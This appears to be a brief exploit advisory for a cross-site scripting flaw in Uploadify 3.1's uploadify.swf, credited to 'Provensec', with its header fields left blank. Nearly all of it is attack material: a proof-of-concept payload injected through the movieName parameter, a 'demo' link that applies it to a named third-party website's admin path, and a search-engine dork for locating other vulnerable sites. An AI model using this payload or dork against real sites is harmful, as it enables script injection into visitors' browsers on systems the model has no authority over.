# Affected software: # Type of vulnerability: # URL: http://www.uploadify.com/ # Discovered by: Provensec # Website: http://www.provensec.com #version 3.1 # Proof of concept uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf demo http://www.renders-dbz.com/admin/include/uploadify/uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf dork:inurl:uploadify.swf ext:swf Source